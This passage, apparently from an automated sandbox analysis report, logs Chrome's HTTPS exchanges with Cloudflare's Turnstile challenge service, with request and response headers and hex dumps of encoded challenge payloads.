                                                                                                    2024-12-23 18:11:56 UTC16384OUTData Raw: 76 5f 38 66 36 61 35 30 64 66 36 38 61 39 34 32 61 30 3d 72 68 52 36 33 43 51 42 64 56 68 51 64 49 42 51 38 32 59 32 47 49 24 51 37 32 59 43 36 44 36 2d 64 32 42 32 4a 36 4b 70 58 43 25 32 62 32 78 36 32 68 51 4d 32 66 67 50 4d 32 61 55 36 51 6b 32 62 36 2b 52 52 52 39 24 32 24 48 32 54 36 56 42 2b 52 51 36 51 72 48 32 55 69 51 50 32 6f 39 4f 50 58 32 56 55 51 71 32 38 55 51 2d 7a 73 38 32 43 42 34 30 36 56 24 32 43 4d 77 66 55 32 4f 77 35 34 71 32 48 6e 58 46 70 64 52 32 32 66 55 32 5a 4d 32 64 58 65 55 32 63 33 55 32 49 4e 52 32 6e 65 75 39 58 36 51 2b 32 2b 54 62 46 6c 4b 62 46 55 39 32 24 41 77 62 52 31 24 4a 4a 6c 77 2d 48 55 61 5a 44 43 6c 69 4a 34 55 44 52 38 77 69 78 36 51 41 61 62 77 4d 51 70 66 49 54 31 7a 32 41 6e 7a 35 58 6e 5a 72 4f 71 5a 49
                                                                                                    Data Ascii: v_8f6a50df68a942a0=rhR63CQBdVhQdIBQ82Y2GI$Q72YC6D6-d2B2J6KpXC%2b2x62hQM2fgPM2aU6Qk2b6+RRR9$2$H2T6VB+RQ6QrH2UiQP2o9OPX2VUQq28UQ-zs82CB406V$2CMwfU2Ow54q2HnXFpdR22fU2ZM2dXeU2c3U2INR2neu9X6Q+2+TbFlKbFU92$AwbR1$JJlw-HUaZDCliJ4UDR8wix6QAabwMQpfIT1z2Anz5XnZrOqZI
                                                                                                    2024-12-23 18:11:56 UTC14899OUTData Raw: 58 78 69 32 69 4b 4c 43 4a 66 2d 36 53 68 6f 63 52 64 33 24 51 37 53 4b 76 61 64 44 32 49 36 51 24 32 4c 32 24 48 51 46 32 2d 63 6c 5a 51 2d 36 58 36 51 42 32 44 46 78 32 51 7a 32 69 32 24 52 24 2b 32 64 32 64 74 49 68 32 51 32 52 55 49 24 32 33 24 2b 55 24 7a 51 4c 32 6f 55 24 68 32 4e 32 30 55 24 6f 32 4f 32 52 53 56 46 51 59 32 51 69 24 68 51 2b 79 51 64 61 43 32 6d 76 32 32 2d 68 32 67 32 4b 36 56 4e 4a 78 52 62 6a 35 4f 32 50 36 49 69 43 64 51 68 36 51 42 4b 4e 32 6e 32 24 75 51 43 51 2d 73 59 76 66 71 51 76 76 49 76 6b 32 61 39 32 6f 32 24 69 32 6a 6d 2b 36 24 33 36 2b 52 49 69 51 24 51 58 32 6e 32 51 43 32 56 32 2d 36 43 55 32 49 66 73 36 24 24 51 2d 32 42 55 51 5a 6c 2d 32 63 55 24 45 32 55 32 61 55 51 4a 32 61 32 44 32 61 4f 51 4f 32 58 36 30 37
                                                                                                    Data Ascii: Xxi2iKLCJf-6ShocRd3$Q7SKvadD2I6Q$2L2$HQF2-clZQ-6X6QB2DFx2Qz2i2$R$+2d2dtIh2Q2RUI$23$+U$zQL2oU$h2N20U$o2O2RSVFQY2Qi$hQ+yQdaC2mv22-h2g2K6VNJxRbj5O2P6IiCdQh6QBKN2n2$uQCQ-sYvfqQvvIvk2a92o2$i2jm+6$36+RIiQ$QX2n2QC2V2-6CU2Ifs6$$Q-2BUQZl-2cU$E2U2aUQJ2a2D2aOQO2X607
                                                                                                    2024-12-23 18:11:57 UTC330INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 23 Dec 2024 18:11:57 GMT
                                                                                                    Content-Type: text/plain; charset=UTF-8
                                                                                                    Content-Length: 26280
                                                                                                    Connection: close
                                                                                                    cf-chl-gen: SbZsZS4iGbnAnFx7Xb/Y1IMDl4fEmJzwYKy+gNwk582LjZ/4pzmDnY3VdYBmY7+xxkkroRm21TLC4/Im$j+LOKTdkvkLZLYpl
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8f6a5129caae440c-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    2024-12-23 18:11:57 UTC1039INData Raw: 6d 48 71 44 6b 34 75 77 68 37 79 53 77 34 2b 36 6e 5a 47 58 78 4c 47 5a 69 49 4c 4e 6a 62 2b 47 30 5a 4b 38 72 74 4b 56 6a 63 53 53 31 4d 32 73 33 73 71 35 79 4d 32 63 31 75 4c 51 78 4b 50 69 34 2b 66 4c 74 63 71 36 70 38 6e 52 71 65 37 50 30 4f 72 51 30 39 6a 69 30 63 2f 35 76 41 43 36 2b 72 7a 57 30 76 7a 6a 42 2b 4f 37 30 75 4b 2b 7a 50 76 4a 38 65 48 71 42 2b 48 7a 43 75 51 4a 31 39 48 6a 30 77 59 56 38 52 67 62 44 43 55 57 47 69 45 54 39 68 58 6a 36 51 48 6d 4b 53 51 6f 37 53 38 48 48 66 41 4c 4d 51 72 79 4c 54 77 56 4d 69 6b 6f 50 50 67 43 46 77 34 31 50 6b 6b 2f 46 7a 6f 70 54 51 6b 33 52 41 38 51 52 30 42 51 45 67 38 59 55 69 6c 52 4e 42 51 32 4f 44 51 33 4c 47 49 73 50 6a 46 56 53 44 73 30 52 43 74 4b 54 33 42 6f 4d 46 35 4f 62 6c 42 75 51 32 52
                                                                                                    Data Ascii: mHqDk4uwh7ySw4+6nZGXxLGZiILNjb+G0ZK8rtKVjcSS1M2s3sq5yM2c1uLQxKPi4+fLtcq6p8nRqe7P0OrQ09ji0c/5vAC6+rzW0vzjB+O70uK+zPvJ8eHqB+HzCuQJ19Hj0wYV8RgbDCUWGiET9hXj6QHmKSQo7S8HHfALMQryLTwVMikoPPgCFw41Pkk/FzopTQk3RA8QR0BQEg8YUilRNBQ2ODQ3LGIsPjFVSDs0RCtKT3BoMF5OblBuQ2R
                                                                                                    2024-12-23 18:11:57 UTC1369INData Raw: 45 74 61 6d 72 68 62 71 73 77 70 6d 36 69 73 33 42 6b 4a 54 42 6e 36 71 7a 30 4e 43 58 70 73 36 6f 76 70 6a 4d 73 75 44 59 35 4e 44 68 79 73 6e 43 74 62 2f 6c 36 4d 32 6e 78 76 44 48 73 2f 50 41 39 73 72 6a 31 4c 69 33 2f 62 47 2f 79 74 62 72 38 65 2f 63 41 74 62 43 36 2b 48 63 36 67 50 59 37 4e 44 53 41 39 4c 68 36 39 41 47 45 77 63 53 32 41 72 73 46 4e 6b 51 49 64 6b 63 45 68 66 34 34 65 41 54 44 42 59 6d 47 52 6e 35 36 43 34 48 4d 50 51 57 42 43 45 79 38 52 66 7a 45 78 45 63 4b 76 4d 4c 47 78 38 6b 46 78 55 67 46 53 51 39 47 30 30 33 52 7a 74 4f 55 7a 46 45 44 6b 41 4b 4b 53 51 37 53 6c 67 78 58 57 42 64 56 31 74 57 57 53 4d 2f 52 30 68 6c 54 45 64 68 4b 32 4e 4b 5a 32 31 6d 63 43 34 31 64 32 35 32 56 44 52 31 56 54 31 4c 66 58 78 2f 67 6a 70 7a 55 6e
                                                                                                    Data Ascii: Etamrhbqswpm6is3BkJTBn6qz0NCXps6ovpjMsuDY5NDhysnCtb/l6M2nxvDHs/PA9srj1Li3/bG/ytbr8e/cAtbC6+Hc6gPY7NDSA9Lh69AGEwcS2ArsFNkQIdkcEhf44eATDBYmGRn56C4HMPQWBCEy8RfzExEcKvMLGx8kFxUgFSQ9G003RztOUzFEDkAKKSQ7SlgxXWBdV1tWWSM/R0hlTEdhK2NKZ21mcC41d252VDR1VT1LfXx/gjpzUn
                                                                                                    2024-12-23 18:11:57 UTC1369INData Raw: 72 63 65 5a 72 6f 71 4d 7a 64 62 43 6c 4b 33 59 75 74 61 7a 76 73 37 59 31 38 47 61 75 4d 50 66 31 2b 50 6a 31 38 58 6e 79 73 72 74 34 39 48 4e 36 4c 48 56 77 65 62 73 37 65 76 46 30 4c 62 74 2b 76 71 32 30 50 72 7a 76 51 44 6e 31 66 7a 62 43 74 6a 33 43 42 44 46 32 65 37 4c 34 75 77 45 41 41 66 50 47 76 62 71 38 2b 6a 76 37 64 77 4c 31 50 4c 35 2b 68 44 5a 49 76 33 38 46 79 48 2b 47 43 6f 4d 49 42 77 67 43 6a 63 71 4c 53 63 31 43 68 6f 2b 2f 44 63 39 39 77 77 77 41 43 45 6b 4d 52 78 41 46 79 77 37 44 44 6f 4a 53 68 6b 45 55 46 41 67 55 68 41 32 4c 79 4d 6c 55 7a 67 39 48 6c 38 33 4f 79 74 58 4e 6a 35 64 57 31 4e 44 50 79 70 69 4a 43 46 6f 57 32 35 6e 54 57 74 50 54 56 5a 6a 4d 45 31 45 52 6c 31 78 54 6b 6b 38 64 6e 70 66 62 32 43 43 5a 34 5a 58 59 33 35
                                                                                                    Data Ascii: rceZroqMzdbClK3Yutazvs7Y18GauMPf1+Pj18Xnysrt49HN6LHVwebs7evF0Lbt+vq20PrzvQDn1fzbCtj3CBDF2e7L4uwEAAfPGvbq8+jv7dwL1PL5+hDZIv38FyH+GCoMIBwgCjcqLSc1Cho+/Dc99wwwACEkMRxAFyw7DDoJShkEUFAgUhA2LyMlUzg9Hl83OytXNj5dW1NDPypiJCFoW25nTWtPTVZjME1ERl1xTkk8dnpfb2CCZ4ZXY35
                                                                                                    2024-12-23 18:11:57 UTC1369INData Raw: 71 4c 52 7a 71 6e 4d 32 62 61 7a 70 62 33 61 7a 4e 75 30 32 4b 4f 76 30 62 44 64 35 62 57 2b 72 4c 66 68 76 4e 72 70 71 66 53 72 74 4f 53 79 78 63 2f 48 37 65 6d 38 32 66 33 72 39 4e 54 75 33 74 50 56 43 4d 58 32 31 51 47 2b 43 2f 63 48 78 75 50 4c 7a 77 6e 51 46 2f 67 4d 36 75 54 34 44 65 34 62 38 39 4c 78 41 4f 50 6b 49 77 62 35 45 65 66 7a 43 43 51 65 34 4f 77 6e 4d 75 6b 55 43 42 55 32 4b 51 4d 36 38 6a 59 77 4c 7a 6b 75 48 52 45 75 2f 76 74 44 2f 52 55 36 48 67 56 4e 4a 43 59 39 41 68 70 53 48 31 42 46 48 6a 5a 57 55 6b 4d 33 58 54 6f 2f 48 6b 39 4e 4d 45 78 45 57 56 5a 62 5a 31 4e 49 4e 69 56 43 56 6b 52 48 50 6c 78 44 5a 6c 56 56 55 32 4e 58 56 33 42 72 4e 6a 34 38 57 44 67 30 50 57 49 39 55 33 31 49 61 58 68 6e 53 6d 4a 63 59 33 78 65 69 6f 61 54
                                                                                                    Data Ascii: qLRzqnM2bazpb3azNu02KOv0bDd5bW+rLfhvNrpqfSrtOSyxc/H7em82f3r9NTu3tPVCMX21QG+C/cHxuPLzwnQF/gM6uT4De4b89LxAOPkIwb5EefzCCQe4OwnMukUCBU2KQM68jYwLzkuHREu/vtD/RU6HgVNJCY9AhpSH1BFHjZWUkM3XTo/Hk9NMExEWVZbZ1NINiVCVkRHPlxDZlVVU2NXV3BrNj48WDg0PWI9U31IaXhnSmJcY3xeioaT
                                                                                                    2024-12-23 18:11:57 UTC1369INData Raw: 61 4f 6e 62 79 72 33 35 71 64 33 4e 4f 7a 31 37 33 61 76 4b 6e 43 34 75 58 46 72 75 71 77 77 4f 4c 6e 37 4b 6a 53 36 63 71 73 30 65 37 7a 2b 74 66 7a 2b 74 50 37 77 76 72 68 34 4f 58 46 36 4f 6f 47 39 63 7a 64 44 66 49 54 43 75 44 30 31 76 4c 52 42 67 37 62 43 65 6b 54 45 42 49 61 45 74 77 4e 41 78 7a 33 48 66 66 6d 47 4f 51 43 4b 77 41 50 36 4f 6a 72 42 6a 55 47 41 41 77 56 46 54 66 79 4d 77 35 41 47 41 34 78 41 69 41 53 4b 44 45 67 4a 54 59 34 4c 53 6f 59 4f 69 68 47 48 77 34 76 49 67 35 52 4d 43 59 76 56 54 45 71 48 7a 4d 37 50 45 31 6b 52 6c 6f 38 57 45 46 61 56 57 52 44 62 6d 56 74 55 57 52 51 5a 56 5a 54 61 6d 46 4c 62 46 68 4c 56 44 56 54 4d 6c 78 7a 50 6b 4a 63 68 6e 5a 67 58 46 61 47 56 46 39 46 67 6d 42 78 6b 6f 70 68 64 6f 65 4f 67 32 75 61 69
                                                                                                    Data Ascii: aOnbyr35qd3NOz173avKnC4uXFruqwwOLn7KjS6cqs0e7z+tfz+tP7wvrh4OXF6OoG9czdDfITCuD01vLRBg7bCekTEBIaEtwNAxz3HffmGOQCKwAP6OjrBjUGAAwVFTfyMw5AGA4xAiASKDEgJTY4LSoYOihGHw4vIg5RMCYvVTEqHzM7PE1kRlo8WEFaVWRDbmVtUWRQZVZTamFLbFhLVDVTMlxzPkJchnZgXFaGVF9FgmBxkophdoeOg2uai
                                                                                                    2024-12-23 18:11:57 UTC1369INData Raw: 72 31 73 4f 63 33 62 72 46 73 65 58 47 79 36 54 74 78 63 53 39 35 63 33 54 39 72 2f 4c 31 64 62 61 7a 4e 72 56 39 4e 37 4b 32 39 4c 77 31 63 36 2b 36 4e 51 4a 33 76 6a 63 35 2b 72 77 33 73 6b 46 2f 66 51 55 42 51 54 77 35 2f 63 4a 39 68 41 61 2b 2b 72 5a 39 78 45 41 38 65 45 6d 41 77 66 37 47 51 48 35 4c 67 30 4f 49 43 55 6b 41 79 58 32 49 78 63 54 4e 53 55 4e 50 44 6b 68 43 7a 45 74 46 53 56 45 4e 54 51 68 47 43 67 35 4a 30 42 4b 4c 42 73 4b 4b 45 45 77 49 68 4a 57 4d 7a 63 73 53 54 45 71 58 6a 30 2b 55 46 56 52 4e 47 5a 45 55 30 64 44 5a 56 55 39 58 53 35 44 51 48 42 70 53 56 56 30 5a 57 52 52 53 46 68 70 56 33 42 36 58 45 73 36 57 48 46 67 55 6b 4b 47 59 32 64 63 65 57 46 61 6a 6d 31 75 67 49 57 46 5a 56 36 52 69 47 69 5a 63 48 31 72 6e 5a 6d 52 67 48
                                                                                                    Data Ascii: r1sOc3brFseXGy6TtxcS95c3T9r/L1dbazNrV9N7K29Lw1c6+6NQJ3vjc5+rw3skF/fQUBQTw5/cJ9hAa++rZ9xEA8eEmAwf7GQH5Lg0OICUkAyX2IxcTNSUNPDkhCzEtFSVENTQhGCg5J0BKLBsKKEEwIhJWMzcsSTEqXj0+UFVRNGZEU0dDZVU9XS5DQHBpSVV0ZWRRSFhpV3B6XEs6WHFgUkKGY2dceWFajm1ugIWFZV6RiGiZcH1rnZmRgH
                                                                                                    2024-12-23 18:11:57 UTC1369INData Raw: 31 36 48 62 76 4f 7a 6b 34 38 44 67 35 4f 48 46 76 38 4c 6d 77 39 50 4b 34 38 72 58 30 76 44 51 41 74 4c 79 31 66 58 57 33 4e 63 4b 32 76 33 64 31 39 72 38 34 42 4c 61 43 4f 54 74 7a 51 58 70 38 2f 6f 4e 36 67 37 2b 45 66 44 37 36 68 62 76 2f 75 55 61 2b 50 50 32 48 2f 6f 49 44 78 67 41 4d 67 4d 4a 42 44 55 70 4a 51 6b 55 41 79 73 4d 50 68 73 77 45 54 44 35 4d 68 52 47 4a 7a 41 61 46 42 4d 37 47 79 67 62 50 78 77 73 47 30 49 6d 4d 44 64 4b 4b 56 6f 33 54 69 34 6f 4c 7a 55 78 4c 45 4e 55 4e 57 59 7a 57 54 70 5a 58 56 77 2b 4e 69 5a 65 51 58 49 2f 59 30 56 41 56 32 56 48 56 45 64 76 53 46 68 62 62 30 39 79 58 33 68 57 55 46 64 77 57 57 4f 42 59 56 79 4f 5a 34 52 69 61 31 4b 43 5a 57 42 7a 69 32 52 30 64 34 70 74 64 31 36 4e 63 6d 78 37 6b 6e 5a 2b 58 70 78
                                                                                                    Data Ascii: 16HbvOzk48Dg5OHFv8Lmw9PK48rX0vDQAtLy1fXW3NcK2v3d19r84BLaCOTtzQXp8/oN6g7+EfD76hbv/uUa+PP2H/oIDxgAMgMJBDUpJQkUAysMPhswETD5MhRGJzAaFBM7GygbPxwsG0ImMDdKKVo3Ti4oLzUxLENUNWYzWTpZXVw+NiZeQXI/Y0VAV2VHVEdvSFhbb09yX3hWUFdwWWOBYVyOZ4Ria1KCZWBzi2R0d4ptd16Ncmx7knZ+Xpx
                                                                                                    2024-12-23 18:11:57 UTC1369INData Raw: 62 72 66 71 61 76 4b 77 4d 71 70 77 75 65 78 39 4d 76 75 31 74 54 53 41 62 37 78 7a 74 38 42 33 4e 63 49 41 63 6e 73 31 51 45 4a 32 2b 76 69 41 74 34 48 45 67 62 69 38 78 58 77 36 78 33 64 38 65 76 39 37 68 41 45 4a 42 6b 68 38 77 51 64 42 2f 34 66 4b 51 45 44 49 51 66 71 43 7a 63 50 45 77 73 53 4d 51 34 49 47 44 6b 73 46 44 44 35 51 42 51 32 2f 52 30 63 49 77 5a 43 47 43 67 39 50 44 42 51 52 55 6b 67 4d 46 55 71 4a 44 52 46 53 43 39 4d 46 6c 67 77 55 6c 55 35 4e 7a 38 69 48 7a 52 46 51 31 68 4d 62 47 46 71 50 45 34 2f 52 6c 52 6e 50 7a 4e 4a 56 54 5a 6f 58 48 78 78 4e 30 78 64 53 7a 39 56 59 55 4a 61 56 47 56 54 52 31 31 2f 53 6e 78 77 6b 49 57 4c 59 48 46 66 55 32 6d 4c 56 6d 35 6f 65 57 64 62 63 4b 4e 65 6b 49 53 6b 6d 61 42 30 68 58 4e 6e 66 4b 39 71
                                                                                                    Data Ascii: brfqavKwMqpwuex9Mvu1tTSAb7xzt8B3NcIAcns1QEJ2+viAt4HEgbi8xXw6x3d8ev97hAEJBkh8wQdB/4fKQEDIQfqCzcPEwsSMQ4IGDksFDD5QBQ2/R0cIwZCGCg9PDBQRUkgMFUqJDRFSC9MFlgwUlU5Nz8iHzRFQ1hMbGFqPE4/RlRnPzNJVTZoXHxxN0xdSz9VYUJaVGVTR11/SnxwkIWLYHFfU2mLVm5oeWdbcKNekISkmaB0hXNnfK9q


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    22192.168.2.549770104.18.95.414434368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-23 18:11:59 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1393713427:1734973920:IGGTGv2DpmF5sqrbzrIYjBSY0pPbZJChLraQ65P8WNY/8f6a50df68a942a0/BIUrUdfl8DVnsgcXACJwYEd1AvMMimk.FhCrhW0NxLA-1734977505-1.1.1.1-PD0jRT.RIJQXXsYXlIHEVMoELPtjdnky9q7YpSD8x7qHfwu_5cCLW_2G5bChFhD5 HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2024-12-23 18:11:59 UTC379INHTTP/1.1 404 Not Found
                                                                                                    Date: Mon, 23 Dec 2024 18:11:59 GMT
                                                                                                    Content-Type: application/json
                                                                                                    Content-Length: 7
                                                                                                    Connection: close
                                                                                                    cf-chl-out: 5i8mVd0nrzUUOfHvWqdarce2VAcCsH1h9RM=$osn2B7hgVhWjttAa
                                                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8f6a51378b370fa8-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    2024-12-23 18:11:59 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                    Data Ascii: invalid


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    23192.168.2.549791104.18.94.414434368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-23 18:12:08 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1393713427:1734973920:IGGTGv2DpmF5sqrbzrIYjBSY0pPbZJChLraQ65P8WNY/8f6a50df68a942a0/BIUrUdfl8DVnsgcXACJwYEd1AvMMimk.FhCrhW0NxLA-1734977505-1.1.1.1-PD0jRT.RIJQXXsYXlIHEVMoELPtjdnky9q7YpSD8x7qHfwu_5cCLW_2G5bChFhD5 HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    Content-Length: 33706
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    Content-type: application/x-www-form-urlencoded
                                                                                                    CF-Chl-RetryAttempt: 0
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    CF-Challenge: BIUrUdfl8DVnsgcXACJwYEd1AvMMimk.FhCrhW0NxLA-1734977505-1.1.1.1-PD0jRT.RIJQXXsYXlIHEVMoELPtjdnky9q7YpSD8x7qHfwu_5cCLW_2G5bChFhD5
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: */*
                                                                                                    Origin: https://challenges.cloudflare.com
                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/hifl3/0x4AAAAAAA1viUI4UDuMAibc/auto/fbE/normal/auto/
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2024-12-23 18:12:08 UTC16384OUTData Raw: 76 5f 38 66 36 61 35 30 64 66 36 38 61 39 34 32 61 30 3d 72 68 52 36 33 43 51 42 64 56 68 51 64 49 42 51 38 32 59 32 47 49 24 51 37 32 59 43 36 44 36 2d 64 32 42 32 4a 36 4b 70 58 43 25 32 62 32 78 36 32 68 51 4d 32 66 67 50 4d 32 61 55 36 51 6b 32 62 36 2b 52 52 52 39 24 32 24 48 32 54 36 56 42 2b 52 51 36 51 72 48 32 55 69 51 50 32 6f 39 4f 50 58 32 56 55 51 71 32 38 55 51 2d 7a 73 38 32 43 42 34 30 36 56 24 32 43 4d 77 66 55 32 4f 77 35 34 71 32 48 6e 58 46 70 64 52 32 32 66 55 32 5a 4d 32 64 58 65 55 32 63 33 55 32 49 4e 52 32 6e 65 75 39 58 36 51 2b 32 2b 54 62 46 6c 4b 62 46 55 39 32 24 41 77 62 52 31 24 4a 4a 6c 77 2d 48 55 61 5a 44 43 6c 69 4a 34 55 44 52 38 77 69 78 36 51 41 61 62 77 4d 51 70 66 49 54 31 7a 32 41 6e 7a 35 58 6e 5a 72 4f 71 5a 49
                                                                                                    Data Ascii: v_8f6a50df68a942a0=rhR63CQBdVhQdIBQ82Y2GI$Q72YC6D6-d2B2J6KpXC%2b2x62hQM2fgPM2aU6Qk2b6+RRR9$2$H2T6VB+RQ6QrH2UiQP2o9OPX2VUQq28UQ-zs82CB406V$2CMwfU2Ow54q2HnXFpdR22fU2ZM2dXeU2c3U2INR2neu9X6Q+2+TbFlKbFU92$AwbR1$JJlw-HUaZDCliJ4UDR8wix6QAabwMQpfIT1z2Anz5XnZrOqZI
                                                                                                    2024-12-23 18:12:08 UTC16384OUTData Raw: 58 78 69 32 69 4b 4c 43 4a 66 2d 36 53 68 6f 63 52 64 33 24 51 37 53 4b 76 61 64 44 32 49 36 51 24 32 4c 32 24 48 51 46 32 2d 63 6c 5a 51 2d 36 58 36 51 42 32 44 46 78 32 51 7a 32 69 32 24 52 24 2b 32 64 32 64 74 49 68 32 51 32 52 55 49 24 32 33 24 2b 55 24 7a 51 4c 32 6f 55 24 68 32 4e 32 30 55 24 6f 32 4f 32 52 53 56 46 51 59 32 51 69 24 68 51 2b 79 51 64 61 43 32 6d 76 32 32 2d 68 32 67 32 4b 36 56 4e 4a 78 52 62 6a 35 4f 32 50 36 49 69 43 64 51 68 36 51 42 4b 4e 32 6e 32 24 75 51 43 51 2d 73 59 76 66 71 51 76 76 49 76 6b 32 61 39 32 6f 32 24 69 32 6a 6d 2b 36 24 33 36 2b 52 49 69 51 24 51 58 32 6e 32 51 43 32 56 32 2d 36 43 55 32 49 66 73 36 24 24 51 2d 32 42 55 51 5a 6c 2d 32 63 55 24 45 32 55 32 61 55 51 4a 32 61 32 44 32 61 4f 51 4f 32 58 36 30 37
                                                                                                    Data Ascii: Xxi2iKLCJf-6ShocRd3$Q7SKvadD2I6Q$2L2$HQF2-clZQ-6X6QB2DFx2Qz2i2$R$+2d2dtIh2Q2RUI$23$+U$zQL2oU$h2N20U$o2O2RSVFQY2Qi$hQ+yQdaC2mv22-h2g2K6VNJxRbj5O2P6IiCdQh6QBKN2n2$uQCQ-sYvfqQvvIvk2a92o2$i2jm+6$36+RIiQ$QX2n2QC2V2-6CU2Ifs6$$Q-2BUQZl-2cU$E2U2aUQJ2a2D2aOQO2X607
                                                                                                    2024-12-23 18:12:08 UTC938OUTData Raw: 35 64 4a 4e 36 44 6d 24 36 7a 32 2b 33 5a 76 75 70 68 48 53 30 2d 32 2b 37 69 6f 48 34 73 62 37 66 6f 79 72 24 46 76 58 79 48 45 73 4b 37 5a 6a 69 47 32 32 6c 52 39 51 6c 59 35 6e 6c 68 32 46 32 50 69 61 55 43 69 2d 6a 34 6f 75 44 6c 36 76 34 59 70 37 67 33 59 72 46 5a 6b 4a 32 5a 58 44 49 43 70 55 79 52 77 49 79 38 73 42 6d 4a 6e 79 4e 73 58 24 6b 43 51 4a 44 56 32 49 72 79 78 36 6b 68 43 55 32 77 32 2b 68 52 70 70 6a 36 64 41 49 69 62 48 55 43 53 24 6e 6c 72 64 66 6f 52 49 61 7a 44 49 52 77 71 6b 5a 46 33 47 77 36 55 76 39 43 6d 35 74 6b 62 2d 32 59 52 67 61 6c 46 4a 59 30 56 6b 62 7a 44 59 78 79 68 42 58 31 59 72 47 36 6e 46 4f 74 35 38 6b 48 44 6f 59 77 64 43 64 42 71 43 67 47 45 39 36 63 47 72 71 4f 5a 46 4d 59 44 74 6b 41 6a 67 77 61 36 70 48 52 50
                                                                                                    Data Ascii: 5dJN6Dm$6z2+3ZvuphHS0-2+7ioH4sb7foyr$FvXyHEsK7ZjiG22lR9QlY5nlh2F2PiaUCi-j4ouDl6v4Yp7g3YrFZkJ2ZXDICpUyRwIy8sBmJnyNsX$kCQJDV2Iryx6khCU2w2+hRppj6dAIibHUCS$nlrdfoRIazDIRwqkZF3Gw6Uv9Cm5tkb-2YRgalFJY0VkbzDYxyhBX1YrG6nFOt58kHDoYwdCdBqCgGE96cGrqOZFMYDtkAjgwa6pHRP
                                                                                                    2024-12-23 18:12:09 UTC1343INHTTP/1.1 200 OK
                                                                                                    Date: Mon, 23 Dec 2024 18:12:09 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 4472
                                                                                                    Connection: close
                                                                                                    cf-chl-out: ITGKrFE6CDrTS8p6RiF8l7ac7ErAl/DOpO/vOxg/A/F0J+6O2Jdwuunzw7oXY8SVQ3ArXfyBNuAE9dHQUIJaIQcz4GImPqIBGZt5Bs84DLUONXqFtBEyYV8=$wnw/pJaFAlqeajIJ
                                                                                                    cf-chl-out-s: kmCxM5WZO12YbKYC2HfAKAsA/Nzv4lwvp/E4jx2czuXteTkS8Jog+ofqZgqItc1XowMJobDniqZNjBp7nsp3eALmuq339wfb4YrOsb89HSwtS/9dDWgSNMU4MkEZfI2LYONJCSfmdvb9ClnNk940u8HOAe78rNsZ8KPD1FNVuHHXPbv18prCK4h4HE2JBYSrtHukdG0LkkVS3ssQd+UmB1gcEnlSrvZ5zLBTmRtT1PDP2+3C6mPpNIZc5Lmx/+9zQKvzmpkYTPtOy0HY7lo7nVAgSRKNO6F1E0jIGS9H48V+kgLnFwIweCOAmcEyqnEHccgKpsvwXqzI8awEegycDz2t8oxHmmwSGDn3i07mxNj09L3/+tk8T6BKslGgaQXPacTlNuVPOgZkmsgnyYfsXWuNaIUPz9T1ADmoUhgu57MN+UdIdj+nQWacRP6n24dfd97C7Ikl7ZKYwHXfI+y/+QRJbMAEqE//WLITDekLEwS+hICX538eq78aSswd7XYUfR/TJnPqiq2gTtnlQu7+8UtoBucDIP86Wzv8I978UqOflqALVzV/Ojza06NHUIezp4xspOmI57fHXzIFQTjeVmNssTGCOoRJEysks2tYLOw8/IB3b4hae2gPfvJo81PU7edhyZnfFFQLe4HrPFjZrySjOYXqP+suBVxeJDP0vpP6NJ7rVhuDWYGnjADesrrfFDUU6I4Go3hZ4h+Uxx6OYDy9cp77sxoaQQNMEaPTCr+UyumUgHVl6zZAWLl91cS/3FC9qUKX/MCDk2fafS4ELDaDClKBO8Ul6gkPVXCFztVdLXDKv9JsvIPM1SGQIPwvs+YCprgWZULX0KYDU6BaN4bZasYz3OtMOjEb1C1obVebA7xh1V3bq01lHtrUuWD9i1r+vpH7t3BLueQzYMJggxFbJqjsOlkVdJ3rhNLuXVEZMWl+qqi1srGXu9eZi22n6X5KW0bVJL67Ubfc2YX7VAsehmffRufErNQqM11G4B8=$cB2Xe [TRUNCATED]
                                                                                                    Server: cloudflare
                                                                                                    2024-12-23 18:12:09 UTC62INData Raw: 43 46 2d 52 41 59 3a 20 38 66 36 61 35 31 37 35 31 39 35 36 37 63 38 61 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
